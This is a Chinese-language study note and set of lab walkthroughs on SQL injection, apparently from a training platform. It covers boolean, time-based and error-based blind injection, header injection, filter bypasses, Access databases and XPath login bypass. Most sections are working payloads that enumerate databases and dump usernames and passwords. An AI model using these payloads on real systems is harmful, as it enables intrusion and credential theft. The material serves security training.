sql注入整理
在我们测试用到的时候,经常会使用到一些语法,应该透彻理解透彻这些函数
1)order byb
用于根据指定的列对。
语句默认按照升序对记录进行排序。
语法:select id ,username,password from users order by password;
data:image/s3,"s3://crabby-images/c3c8b/c3c8b64c93adaa0a96fe54bedb09f07366e6fc3e" alt=""
2)UNION 操作符
MySQL UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。多个 SELECT 语句会删除重复的数据。
注意:UNION 内部的每个 SELECT 语句必须拥有。列也必须拥有相似的数据类型。
默认地,UNION 操作符选取不同的值。如果允许重复的值,请使用 UNION ALL。
语法:select * from users union select 1,2,3;
data:image/s3,"s3://crabby-images/dec78/dec789ac9ec66b5188a4580adfc67d9167e0428c" alt=""
输入不同的列数,会报错
data:image/s3,"s3://crabby-images/05281/05281c3e269a7004ca95f624267b697690a51009" alt=""
3)limit
LIMIT 接受一个或两个数字参数。参数必须是一个整数常量。如果给定两个参数,第一个参数指定第一个返回记录行的偏移量,第二个参数指定返回记录行的最大数目。初始记录行的偏移量是 0(而不是 1)
语法:
limit 0,1, 从你的表中的第0个数据开始,只读取一个;
4)concat函数,concat_ws函数,concat_group函数之间的区别
- concat()函数
concat()函数用于将多个字符串连接成一个字符串。
使用数据表users作为示例,其中select id,username,password from users limit 1;
mysql> select id,username,password from users limit 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
语法及使用方式
concat(str1,str2,......)
如果结果为连接参数产生的字符串。如果任何一个参数为NULL,则返回NULL。可以是一个参数也可以是多个参数。
使用方法:
mysql> select concat(id,',',username,',',password) as con from users limit 1;
+-------------+
| con |
+-------------+
| 1,Dumb,Dumb |
+-------------+
1 row in set (0.00 sec)
分隔符为NULL 示例
mysql> select concat('id',null,'username') as con from users limit 1;
+------+
| con |
+------+
| NULL |
+------+
1 row in set (0.00 sec)
- concat_ws
指定参数之间的分隔符
使用concat_ws()
使用语法:concat_ws(separator,str1,str2.....)
concat_ws() 代表concat with separator ,是concat()的一种特殊形式。第一个参数为分为分隔符,分隔符的位置放在要连接的两个字符串之间,分隔符可以是一个。如果分隔符为NULL,则结果为NULL。函数会忽略任何分隔符后面的NULL值。
但是concat_ws()不会忽略任何字符串(然而会忽略所有的null)
示例:
mysql> select concat_ws('-',id,username,password) as con from users limit 2,2;
+------------------+
| con |
+------------------+
| 3-Dummy-p@ssword |
| 4-secure-crappy |
+------------------+
2 rows in set (0.00 sec)
mysql> select concat_ws('-','username',null,'password');
+-------------------------------------------+
| concat_ws('-','username',null,'password') |
+-------------------------------------------+
| username-password |
+-------------------------------------------+
1 row in set (0.00 sec)
-
group_concat()
group_concat函数返回一个字符串结果,该结果由分组中的值连接组合而成 -
group by
可以将sql查询的结果按照group by后面列进行分类显示
如:
select columnA,columnB from table group by columnA,columnB
则查询结果将按照columnA和columnB分类显示。没有显示在group by中的列不能直接作为返回列放在sql语句中,比如如下sql就是不正确的
select columnA,columnC from table group by columnA
习题
1、SQL注入(布尔盲注注入)
用到的函数
- substr
substr函数是用来截取数据库某一列字段中的一部分。
用法:
substr(str,pos,len); //str:字符串,pos:起始位置,len:截断长度
mysql> select substr('2018-08-0711111',6,7);
+-------------------------------+
| substr('2018-08-0711111',6,7) |
+-------------------------------+
| 08-0711 |
+-------------------------------+
1 row in set (0.00 sec)
mysql> select substr('2018-08-0711111',6);
+-----------------------------+
| substr('2018-08-0711111',6) |
+-----------------------------+
| 08-0711111 |
+-----------------------------+
1 row in set (0.00 sec)
mysql中的substr()函数和hibernate的substr()参数都一样,就是含义有所不同。
区别:
mysql中的start是从1开始的,而hibernate中的start是从0开始的。
所谓的盲注,就是在注入过程中,sql语句的执行结果不回显到前端,这个时候只能用一些其他的方法进行尝试和判断,这个判断的过程叫做盲注,盲注可以分为:布尔盲注、基于时间的盲注、基于报错的盲注
既然是布尔盲注,那回显结果肯定要被判别为True和False.
这里举例,墨者学院的题目。
不太想用工具,所以把注入过程整理出来
启动靶机,发现是一个登陆口,界面上滚动栏存在sql注入点
data:image/s3,"s3://crabby-images/b368b/b368b38c56f36e564350314be5866ec9bd65cb0b" alt=""
判断是否存在注入,输入单引号,页面报错
data:image/s3,"s3://crabby-images/03974/03974d9843bb189c5843c138236d19a146bce2e0" alt=""
这里就把页面是为False,上面页面有内容视为True.然后我们就能以标准去判断枚举,比如我们猜测数据库的长度,判断它是不是大于10,我们可以访问
http://219.153.49.228:41882/new_list.php?id=1 and length(database())>10
data:image/s3,"s3://crabby-images/6efa7/6efa7844ff17f61b5d70d47287d8129ea5a5248e" alt=""
结果页面返回Flase,就是说明数据库小于10或者等于10,于是进行下一步探测,发现长度等于10
data:image/s3,"s3://crabby-images/ba744/ba744a180da4270e55a975a500a622ab21738c13" alt=""
知道了数据长度,下面就要猜测数据库名了,我们这边使用substr函数进行探测
语句为
?id=1 and ascii(substr((select database()),1,1))=111
手动一个一个探测肯定慢,还是使用burpsuite进行探测
data:image/s3,"s3://crabby-images/d2d4b/d2d4bfd022c3ff00472a66594df6bb51120ea19e" alt=""
payload 1设置为数据库的长度10
payload 2 设置为numbers,from 1 ,to 127,step1
进行爆破
data:image/s3,"s3://crabby-images/cb287/cb287f306a7a83ffc71aed490b794967d4aea136" alt=""
跑出来的结果和ASCII值进行匹配,结果为:
data:image/s3,"s3://crabby-images/3588c/3588c1abcf9fd826b0bc269569e74c6d8bff5fe6" alt=""
库:
stormgroup
知道了库,下面就要爆破 表名了,重复上面的步骤即可,发现数据库存在两个表,
and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),1,1))=110
data:image/s3,"s3://crabby-images/c4f95/c4f953a8f133f89c8e2901dd1bbfd67d9dedc8d5" alt=""
and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),1,1))=109
data:image/s3,"s3://crabby-images/1cf3d/1cf3d4229ad4c6902153c4a10ee77d10295226c6" alt=""
表为
notice
member
探测列名
and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),1,1))
data:image/s3,"s3://crabby-images/a7d16/a7d16e17bd0c53e9a50610f933855ba932cb199f" alt=""
and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 1,1),1,1))
data:image/s3,"s3://crabby-images/30cef/30cef6472463eaac27539fd25f5be3c447be8f37" alt=""
我只要知道存用户名和密码的列即可,其他的列可以不用猜测的
列:
name
password
接下来就是才是用户密码密码了,这边用户名好猜测,密码我就不知道怎么猜测了,密码是MD5加密32位的。
and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))
data:image/s3,"s3://crabby-images/98caf/98caf8c2a5905c70c946e5ff4801d4952ee33314" alt=""
得到的用户名位:mozhe
爆破密码
and ascii(substr((select concat(password) from stormgroup.member limit 1,1),1,1))
data:image/s3,"s3://crabby-images/00297/00297bb3f9ca1dc55b4c293ae15439ad932afbd2" alt=""
把爆破位数和ascii的值进行整理,python把ascii表转换成数字与字母,解码得到密码,进行登陆。
盲注时候经常用到比较,这时候要是比较符号(<>)被注释了不能用平常的方法了,所以需要用某些函数如greatest()[greatest(n1,n2,n3....)
函数返回输入参数(n1,n2,n3.....)的最大值]、least()等
,比如下面语句:select * from users where id =1 and ascii(substr(database(),0,1))>64
就就可以替换成select * from users where id =1 and greatest(ascii(substr(database(),0,1)),64)=64
等价函数绕过:
hex()、bin() ---->ascii()
sleep() --->benchmark()
concat_ws() ---> group_concat()
mid()、substr() --->substring()
@@user ---> user()
@@datadir --->datadir()
举例说明substring()
和substr()
无法使用时:id=1+and+ascii(lower(mid((select+pwd+from+users+limint+1,1),1,1)))=74
或者:
substr((select 'password'),1,1)=0x70
#0x70,十六进制编码
strcmp(left('password' ,1),0x69)=1
strcmp(left('password',1)0x70)=0
strcmp(left('password',1),0x71)=-1
2、X-Forwarded-For注入漏洞
漏洞背景
在Web应用开发中,经常会需要获取客户端IP地址。一个典型的例子就是投票系统,为了防止刷票,需要限制每个IP地址只能投票一次。
X-Forwarded-For也是HTTP头注入注入的一种;
如何获取到客户端ip
在java中,获取客户端IP最直接的方式就是使用。这种方式能获取到连接服务器客户端IP,在
,这种方式最简单最直接。但是互联网web应用很少会将应用服务器直接对外提供服务,一般都是会有一层nginx反向代理和负载均衡,有的甚至可能还有很多层代理。在有代理的情况下,直接使用
获取到的是nginx所在的服务器IP地址,并不是客户端的IP地址。
为了解决这个问题,很多HTTP代理会在HTTP头中添加头,用力追踪请求的来源。X-Forwarded-For的格式如下
X-Forwarded-For:client1,proxy1,proxy2
包含多个IP,每个值使用逗号+空格分开,最左边(client1)是最原始客户端的IP地址,中间如果有多层代理,每一层代理会将连接它的客户端IP追加到
右边。
用到的函数
- extractvalue()
语法:extractvalue(目标xml文档,xml路径)
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
- updatexml()
and extractvalue(null,concat(0x7e,(sql_inject),0x7e))
可以理解成,让后台xml故意报错
0x7e的具体含义是:~
利用这种方式,对后台进行一个排序,指定第一个参数位null,让他故意报错,将第二个参数中的语句带入数据库执行,最后报错显示执行的结果。
id= 1 and extractvalue(null,concat(0x7e,(select database()),0x7e))
and updatexml(1,concat(0x7e,(sql_inject),1))
updatexml用于更新XML数据的,但是我们非法传参的话,使他估计报错,执行我们的SQL语句,0x7e任然是~用来区分数据的
漏洞示例演示:
打开环境,发现页面只有登陆口,对登陆口进行用户名密码猜解,点击提交,提示框会收集客户端IP地址,说明IP地址被记录了,把IP地址inser到表中
data:image/s3,"s3://crabby-images/d5088/d50883915d46e81fa4ad675dc6270ccffadd892c" alt=""
抓包瞅瞅,在数据包中加入x-forwarded-for头,值为:127.0.0.1发送请求后发现返回alert语句,记录了我们使用的这个IP地址,后面加上单引号直接爆错。看到登录页面的时候心里就应该知道,他是没有返回的地方的,但是开启了报错信息,所以有可能是报错注入。
data:image/s3,"s3://crabby-images/809f2/809f25bcf8cf351bdb91504b369ace0b165978fa" alt=""
根据回显数据知道输入的ip会回显,尝试注入
由于用了单引号进行报错,所以后面一定要构造闭合,爆当前数据库
127.0.0.1' and extractvalue(null,concat(0x7e,(select database()),0x7e)) and '1'='1 #and '1'='1用于闭合后面的语句
data:image/s3,"s3://crabby-images/6b44c/6b44c200f8bb2ab88c45c54f6cedb307285747f6" alt=""
枚举表名
127.0.0.1' and extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='webcalendar'),0x7e)) and '1'='1
data:image/s3,"s3://crabby-images/b2293/b2293f78bce9cb00cb0c155cbb847fddb285f9b6" alt=""
枚举列名
127.0.0.1' and extractvalue(null,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='webcalendar' and table_name='user'),0x7e)) and '1'='1
data:image/s3,"s3://crabby-images/58a1f/58a1f68126a20a198913e49789bb398739e93cd8" alt=""
枚举用户名密码
127.0.0.1' and extractvalue(null,concat(0x7e,(select group_concat(username,password) from user),0x7e)) and '1'='1
data:image/s3,"s3://crabby-images/a015d/a015d22dbbb45328504f16f165191521f44c360d" alt=""
等到用户名密码进行登陆。
3、SQL过滤字符后手工注入漏洞测试(1)
测试的时候发现不管输入什么字符都不行,估计是检测到我注入语句了,然后进行跳转;
过滤了空格,过滤了=,所以这边我们空格使用/**/进行绕过,=使用like或in进行绕过;
这个题目还有一个坑,我是网上看wp才知道的,order by,union select ,and 字段,也被过滤了,需要url编码之后才能进行注入
判断注入的类型数值型
/**/and/**/1/**/like/**/1 页面正常显示
/**/and/**/1/**/like/**/2 页面报错
data:image/s3,"s3://crabby-images/12e98/12e98eaa5cf8fbc039c10aced0fc0550b30bc50d" alt=""
知道注入类型之后,还有绕过的方式,下面就开始表演把。
下面所有注入语句都需要利用burpsuite自带的模块decoder进行url编码
测试长度5报错,4正常显示,说明长度为4
/**/order/**/by/**/5
data:image/s3,"s3://crabby-images/35b5d/35b5d3252b64122a108a124b93b605beab904b6f" alt=""
查看当前显示位
/**/union/**/select/**/1,2,3,4 进行url编码
data:image/s3,"s3://crabby-images/f23b3/f23b39de83424518f9e7646b84d676c09d1920d1" alt=""
当前数据库和当前数据用户
/**/union/**/select/**/1,database(),user(),4
data:image/s3,"s3://crabby-images/588d8/588d8eab3a22b5f436b53c99abaa8f65fcb2c46c" alt=""
判断表
/**/union/**/select/**/1,group_concat(table_name),3,4 from/**/information_schema.tables/**/where/**/table_schema=database()
data:image/s3,"s3://crabby-images/090c0/090c0f94d4ded488c0ac832bb601b38fbc5aa9e4" alt=""
判断列
/**/union/**/select/**/1,group_concat(column_name),3,4/**/from information_schema.columns/**/where/**/table_name='stormgroup_member
data:image/s3,"s3://crabby-images/9e4db/9e4db243b321245cf96ede497bc38605008815d6" alt=""
获取数值
/**/union/**/select/**/1,group_concat(name),group_concat(password),4/**/from/**/stormgroup_member
data:image/s3,"s3://crabby-images/2229d/2229d1f4f6680d901e4c8c1dff328046c9a696dd" alt=""
4、SQL手工注入测试(Access数据库)
,所有的表都是在一个数据库下的,所有我们不用去判断当前的数据库,并且Access数据库中也
Access数据库中的函数
select len('string') #查看给定字符串的长度
select asc('a') #查看当前给定字符串的ascii值
top n #查询n条记录
select mid('string',2,1) #查询给定字符串从指定索引开始的长度
mid(string,start,length)这个用来截取字符串的
- string是要截取字符串
- start是截取的字符串开始的索引
- length是要截取字符串的长度
Access数据库持有表是:msysobjects,所以可以用它来判断是否是Access数据库
exists(select*from msysobjects) #如果这条语句正确,说明是Access数据库
判断漏洞类型为数值型
and 1=1 返回正常
and 1=2 返回报错
data:image/s3,"s3://crabby-images/67e08/67e08001a298420157800a90201b03378fd8aaa0" alt=""
判断长度长度为4,5页面报错
order by 4
data:image/s3,"s3://crabby-images/69733/69733cbe85be8ab06c6366c760cbc2d7d29b1302" alt=""
猜表名(应为Access数据库用联合语句显示可显示字段时,必须用“from 表名,所有要先猜测表名”)
and exists(select * from admin) #若存在表名为admin的表,则正常显示,否则现在出错
表为:admin
常见的表有
admin admins admin_user admin_usr admin_msg admin_login user username manager msg_user msg_login useradmin 等等
data:image/s3,"s3://crabby-images/bf483/bf4837db339a2492a0352d93af1ac79f618e2191" alt=""
提示:Access数据库有个表名为:news,没啥用
猜列名
and exists(select username from admin) #若admin表中存在列名为username的列,则页面显示正常,否则页面出错
and exists(select passwd from admin) #若admin表中存在列名为passwd的列,则页面显示正常,否则页面出错
列名为:passwd和username
data:image/s3,"s3://crabby-images/00f8e/00f8ef68d522e7ddf7fb051423ee2e8be24733ba" alt=""
data:image/s3,"s3://crabby-images/ac1bf/ac1bf4e2ac93772169424c99e3adf19877b59319" alt=""
常见的列
admin admin_user username password passwd pass pwd users usr user_login user_name login_name 等等
最后一步就是获取用户名和密码了
首先需要判断显示位
union select 1,2,3,4 from admin
data:image/s3,"s3://crabby-images/1b056/1b056922b605b7325cb248418cb24b9a47e7dffe" alt=""
联合查询
union select 1,username,passwd,4 from admin
data:image/s3,"s3://crabby-images/94efb/94efbf78b541e916786b05a25fca9b3b8101d579" alt=""
得到用户名和密码,我这个是好猜测的,一般都是比较难猜测表和列的。
猜测admin列的第一个数据的长度,如果大于5查询不出数据,大于4正常,说明admin列的第一个数据长度是5
and (select top 1 len(admin)from admin)>5
猜测admin列的第一行数据的第一个字符的ascii码值,如果大于97查询不出数据,大于96正常,说明admin列的第一行数据的第一个字符的ascii值是97
and (select top 1 asc(mid(admin,1,1))from admin)>97
第一行数据的第二个字符
and (select top 1 asc(mid(admin,2,1))from admin)>97
从第二行开始,查询数据就得用另外的语句了,因为这里的top只能显示查询前几条数据,所以我们得用联合查询,先查询前两条,然后倒序,然后在找出第一条,这就是第二条数据。
查询第二行admin列的长度
and (select top 1 len(admin) from ( select top 2 * from information order by id) order by id desc)>55
下面是查询第2条数据的第3个字符
and (select top 1 asc(mid(admin,3,1)) from ( select top 2 * from information order by id) order by id desc)>55
查询第三条数据的4个字符
and (select top 1 asc(mid(admin,4,1)) from ( select top 3 * from information order by id) order by id desc)>55
输入-1页面报错
data:image/s3,"s3://crabby-images/5824f/5824f1caec9ad50d6653647ed73597bbdaebbc27" alt=""
数值型注入
and 1=1 正确
and 1=2 报错
data:image/s3,"s3://crabby-images/2ae71/2ae71bbff61aac29078686b3ca7c45d17d6abd85" alt=""
长度4,5爆错
order by 4
data:image/s3,"s3://crabby-images/92ca6/92ca6fcf2a729772162623b4e802daa12768e23b" alt=""
显示位
?id=-1 union select 1,2,3,4
data:image/s3,"s3://crabby-images/6451f/6451fced303e8e55acf44b3f9ae6eae31c4cab70" alt=""
当前数据库与用户
?id=-1 union select 1,database(),user(),4
data:image/s3,"s3://crabby-images/9ba10/9ba10c79d4f70f9c2bac624e947b8e6539637c63" alt=""
列
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
data:image/s3,"s3://crabby-images/1134b/1134bdadd7e00eb4a99cbf4dc180f5281ef7014c" alt=""
表
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=‘mozhe_Discuz_StormGroup' and table_name='StormGroup_member'
data:image/s3,"s3://crabby-images/44e16/44e16db31761a778182624a480e50973bcaf4ce7" alt=""
爆用户名和密码
?id=-1 union select 1,group_concat(name),group_concat(password),4 rom StormGroup_member
data:image/s3,"s3://crabby-images/322e3/322e31790d78eb22e608ab93c6e13e3b3938a141" alt=""
5、SQL注入漏洞测试(报错盲注)
根据题目提示可以知道,该题目是报错盲注,上面提到的两个函数都是可以使用的extractvalue()和updatexml(),上面我用过extractvalue函数了,这题我将使用updatexml函数。
输入单引号页面报错,存在注入
data:image/s3,"s3://crabby-images/9cf9c/9cf9c60fc16ce83339191d9639f36b6e14a8fbb5" alt=""
判断注入的类型
and 1=1 and 1=2 页面均显示正常
判断为字符型
' and 1=1 --+ 页面正常
' and 1=1 --+ 页面报错
根据上面报错信息,我们可以知道后面的语句需要进行闭合 --+或者%23都可以
判断长度为4,5页面报错
?id=1' order by 4 --+
data:image/s3,"s3://crabby-images/67fc1/67fc1eaf33a22f1850ef04229bb092f864ea8369" alt=""
判断当前数据库也可以判断当前用户名,修改database()变成user()即可
?id=-1' and (updatexml(null,concat(0x7e,(select database()),0x7e),1)) --+
data:image/s3,"s3://crabby-images/bae30/bae30704b239433cea10aeb90823c0b77047bfc6" alt=""
查看表
?id=-1' and (updatexml(null,concat(0x7e,(select group_concat(table_namea) from information_schema.tables where table_schema=database()),0x7e),1)) --+
data:image/s3,"s3://crabby-images/a7e3f/a7e3fc606b9d35c2e37c6eda7a1f5061ba20f8c1" alt=""
查看列
?id=-1' and (updatexml(null,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='member'),0x7e),1)) --+
data:image/s3,"s3://crabby-images/c16b2/c16b22366bd74f98f5a6500a95278f40b706fb0d" alt=""
爆用户名密码
?id=-1' and (updatexml(null,concat(0x7e,(select group_concat(name,0x7e,password)from member),0x7e),1)) --+
data:image/s3,"s3://crabby-images/045cf/045cf4ea0029a27e92ab668b8c829554e3e101a9" alt=""
哎,不对呀,这个密码怎么只显示了一半呢?看了其他人的wp知道,由于报错回显的字符串位数有限,因此使用substr进行裁剪
获取密码前20位
status=1 获取status为1的name和password的值,其他值可以根据实际环境进行调整0,1,2.....
?id=-1' and (updatexml(null,concat(0x7e,substr((select group_concat(name,0x7e,password) from member where status=1),1,20),0x7e),1)) --+
data:image/s3,"s3://crabby-images/029c0/029c03ae17287043f804dad72f17b6c34fca31c5" alt=""
获取密码21-40
?id=-1' and (updatexml(null,concat(0x7e,substr((select group_concat(name,0x7e,password) from member where status=1),21,40),0x7e),1)) --+
data:image/s3,"s3://crabby-images/7ca92/7ca92bdbd8aba0707033ddb6d4cc18600c9160c2" alt=""
解密进行登陆
6、SQL注入漏洞测试(HTTP头注入)
第一次做这种类型的环境,看了其他人的wp才知道注入点在host上面
修改host参数
or 1=1 页面报错,判断存在注入
判断长度
长度为4,5报错
Host:order by 4
data:image/s3,"s3://crabby-images/ec589/ec5892474234df353cfbbed4b13d27dcbe0b24b2" alt=""
判断显示位
Host: union select 1,2,3,4
data:image/s3,"s3://crabby-images/15d20/15d20eb8973a0d8cd4be71c61d14c9a7abdd223c" alt=""
判断当前数据库与用户名
Host: union select 1,database(),user(),4
data:image/s3,"s3://crabby-images/6f233/6f23342654e075820b2f3eea3cef85d93cf20722" alt=""
枚举表
Host: union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
data:image/s3,"s3://crabby-images/79a21/79a215bdea48f910a3c499a5a4eecf2b75be9e3e" alt=""
枚举列
Host: union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='flag'
data:image/s3,"s3://crabby-images/c6c57/c6c5726b0b1507bab9b45f46325a8c4fd2b184f9" alt=""
获取flag
Host: union select 1,group_concat(flag),3,4 from flag
data:image/s3,"s3://crabby-images/4cadd/4cadd1b4b43c92db424d2c6079ab7901e0e54506" alt=""
7、SQL手工注入漏洞测试(MySQL数据库-字符型
输入单引号页面报错
data:image/s3,"s3://crabby-images/9bafc/9bafcc0e80035cdc0e448e628cc1a71e1d8a6121" alt=""
输入
?id=tingjigonggao' and '1'='1 页面正常显示
?id=tingjigonggao' and '1'='2 页面显示异常
data:image/s3,"s3://crabby-images/04d62/04d62cf97e0e5797e9ebb2c613967d6d3b455550" alt=""
判断长度
长度为4,5爆错
?id=tingjigonggao' order by 4 %23
data:image/s3,"s3://crabby-images/a68cc/a68cc6141b2e601170aa85536453191406697434" alt=""
判断当前显示位
?id=-1' union select 1,2,3,4 --+
data:image/s3,"s3://crabby-images/88e1a/88e1a6c4829075f8066ef18c54c59874e20d1a9e" alt=""
判断当前数据库
?id=-1' union select 1,database(),3,4 --+
data:image/s3,"s3://crabby-images/a8457/a8457644523b08ea6da4e9b25ecef1c0ffd114f6" alt=""
判断表
?id=-1' union select 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database() --+
data:image/s3,"s3://crabby-images/c0b1e/c0b1ee9d8fe64cefb397dd443d1d97f57a331af0" alt=""
判断列
?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='stormgroup_member' --+
data:image/s3,"s3://crabby-images/3234a/3234a2c30575119ace4540f4d942c139b9d647af" alt=""
爆用户名密码
?id=-1' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member --+
data:image/s3,"s3://crabby-images/74440/74440f269597f856af3c1a1580487ef9c042fb2a" alt=""
8、SQL注入漏洞测试(时间盲注)
原理:当数据库进行查询操作,如果查询的条件不存在时,语句执行的时间便是0,但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本上是0。
例子
data:image/s3,"s3://crabby-images/fe62b/fe62bf2aa7f56f8518df9ba23a110eb109937fcc" alt=""
于是sleep(N)这个语句在这种情况下起到了非常大的作用。
Select sleep(N)可以让此语句运行n秒钟。
data:image/s3,"s3://crabby-images/776d2/776d280a8153e5493031b341c0fec22897ac5e39" alt=""
但是如果查询语句的条件不存在,执行的时间便是0,利用该函数这样一个特殊的性质,可以利用时间延迟来判断我们查询的是否存在。
这便是SQL基于时间延迟的盲注的工作原理
用到的函数
if
格式:if(Condition,a,b)
含义:如果Condition成立,则A,负责B
substr
格式:substr(string,start,len)
含义:从string的start位开始截取len个字符
ascii
格式:ascii(char)
含义:将char转换成ascii码
盲注思路:
基于时间的盲注
if(ascii(substr(查询语句,start,1))=97,sleep(3),1)
基于布尔盲注
or ascii(substr(查询语句,start,1))=97
substr函数中可以连接select语句
两种类型注入的区别
- 基于布尔盲注是根据页面差异判断是否存在注入,以及数据注入的
- 基于时间盲注是通过盲注不能得到差异页面的(比如不管输入什么都显示一个页面,这时候可以尝试时间盲注)
补充
- 第一种情况:无论输入什么都只是无信息页面,例如登陆页面。这种情况下可能只有登陆失败页面,错误页面被屏蔽了,并且在没有密码的情况下,登录成功的页面一般情况下也不知道。在这种情况下,有可能基于时间的sql注入会有效。
- 第二情况:无论输入什么都只是正常信息页面,例如:采集登录用户信息的模块页面,采集用户的IP、浏览器类型、refer字段、session字段、无论用户输入什么,页面都显示正常。
- 第三种情况下:差异页面不是由输入URL中的sql语句来决定的,这种情况下,也只能使用基于时间盲注。
例子:
判断当前数据库是否存在注入
输入
?type=1 and if(1=1,sleep(5),1) --+ 时间为5.23s
?type=1 and if(1=2,sleep(5),1) --+ 时间297ms
存在时间注入
data:image/s3,"s3://crabby-images/b142c/b142cedc66d95d5171db1028f4b6192c2352a646" alt=""
判断数据库长度
当等于12时,发送时间注入延时
?type=1 and if(length(database())=12,sleep(5),1) --+
data:image/s3,"s3://crabby-images/15ece/15ecee60b775e15fab66b61d808a53b54062f4f1" alt=""
查看当前数据库
依旧使用神器bp,进行爆破
?type=1 and if(ascii(substr(database(),1,1))=98,sleep(5),1) --+
data:image/s3,"s3://crabby-images/93e26/93e263b84a5c6d7fc6f41bf7f2a4a88dfa10ce86" alt=""
猜表的长度
判断长度为4,发送时间注入延时
?type=1 and if(length((select table_name from information_schema.tables where table_schema='pentesterlab' limit 1,1))=4,sleep(5),1) --+
data:image/s3,"s3://crabby-images/8b4db/8b4db19090f5e774582fa810332a02f957db7901" alt=""
猜解当前表,有4个表,修改payload进行猜解
表:comment、flag、.....
?type=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(5),1) --+
data:image/s3,"s3://crabby-images/ab11c/ab11c1d0219bc76ad8f96414dc368c5e68d29b4f" alt=""
?type=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=116,sleep(5),1) --+
data:image/s3,"s3://crabby-images/2b966/2b96605e5a38a222bf5e1ecef84251861af65d29" alt=""
获取字段值
猜解长度,为4
?type=1 and if(length((select column_name from information_schema.columns where table_name='flag' limit 1,1))=4,sleep(5),1) --+
data:image/s3,"s3://crabby-images/63561/63561406b2164a37d20442dfff1e70eccc752a0c" alt=""
字段猜测
?type=1 and if(ascii(substr((select column_name from information_schema.columns where table_name=‘flag’ limit 0,1),1,1))=105,sleep(5),1) --+
data:image/s3,"s3://crabby-images/9cd32/9cd32bc8a395391f56c42343963d226a6c8a4b8c" alt=""
?type=1 and if(ascii(substr((select column_name from information_schema.columns where table_name=‘flag’ limit 1,1),1,1))=105,sleep(5),1) --+
data:image/s3,"s3://crabby-images/aa47f/aa47fe0c0645a63e07f2cc969b1ba777f45dc748" alt=""
表有:id 、flag.........
获取数据
判断长度
长度为6,发送延迟注入
?type=1 and if(length((select flag from flag limit 0,1))=6,sleep(5),1) --+
data:image/s3,"s3://crabby-images/9b5ab/9b5aba00f1cd41c3643a5f43d7550e05c983263e" alt=""
?type=1 and if(ascii(substr((select flag from flag limit 0,1),1,1))=109,sleep(5),1)--+
data:image/s3,"s3://crabby-images/f1456/f1456e640bc798b1ca73d39bb176e537970628d8" alt=""
得到flag,进行提交
9、XPath注入漏洞实战
XML 被设计用来传输和存储数据
HTML 被设计用来显示数据。
在利用漏洞前,我们需要对漏洞原理进行理解。
由于SQL中存在权限的概念,所以在程序中和数据库方面都可以对数据库权限做分配和防护。而XPath中数据管理不受权限控制,在表单中提交恶意的XPath代码,就可以直接获取到权限数据的访问权,并可修改这些数据。同样的,构造恶意查询获取到系统内部完整的XML文档内容造成信息泄露。也可以在获取到XML文档内容后进行用户权限提升等。
XPath注入
XPath是一种用在内存中导航整个XML数的语言,它使用路径表达式来获取XML文档中的节点或者节点集。XPath的设计初衷是作为以一种面向XSLT和Xpointer的语言,后来独立成了一种W3C标准。而XPath注入是指利用XPath解析器的和
,能够在url、表单或其他信息上附带恶意的XPath查询代码,已获得权限信息的访问权并更改这些信息。XPath注入与SQL注入类似,均是通过构造恶意的查询语句,对应用程序进行攻击。
XPath注入攻击原理
Xpath注入的原理其实和sql注入很像,Xpath攻击注入主要通过构建特殊的输入,这些输入往往是Xpath语法中的一些组合,这些输入将作为参数传入web应用程序,通过执行Xpath查询而执行入侵者想要的操作,但是,注入的对象不是。
攻击者可以获取xml数据的结构,或者访问在正常情况下不允许访问的数据
,如果xml数据被用户认证,那么攻击者就可以提升权限。
因为Xpath不存在访问控制,所以我们不会遇到许多在SQL注入中经常遇到的访问限制。XML中没有访问控制或者用户认证,如果用户有权限使用Xpath查询并且之间没有任何防御系统或者查询语句没有被防御系统过滤,那么用户就能够访问整个XML文档。
注入出现的位置也就是XPath注入攻击主要是通过构造特殊的输入,这些输入将作为参数传入web应用程序中,通过执行XPath查询而执行入侵者想要的操作,下面以登录验证中的模块为例,说明XPath注入攻击的实现原理。
在WEB应用程序的登陆验证过程中,一般有用户名(username)和密码(password)两个参数,程序会通过用户所输入的用户名和密码来执行授权操作,如验证数据存放在XML文件中,其原理是通过查找user表中的用户名(username)和密码(password)的结果来进行授权访问。
例如存在user.xml文件如下:
<users>
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
则在XPath中其典型的查询语句如下:
//users/user[loginID/text()='zs' and password/text()='123test']
但是可以采用如下方式实施注入攻击,绕过身份验证。如果用户传入一个login和password,例如loginID='zs'和密码password='123test',则该查询语句将放回True。但如果用户传入类似'or 1=1 or ''='的值,那么该查询语句也会得到True返回值,
//users/user[loginID/text()=''or 1=1 or ''='' and password/text()=''or 1=1 or ''='']
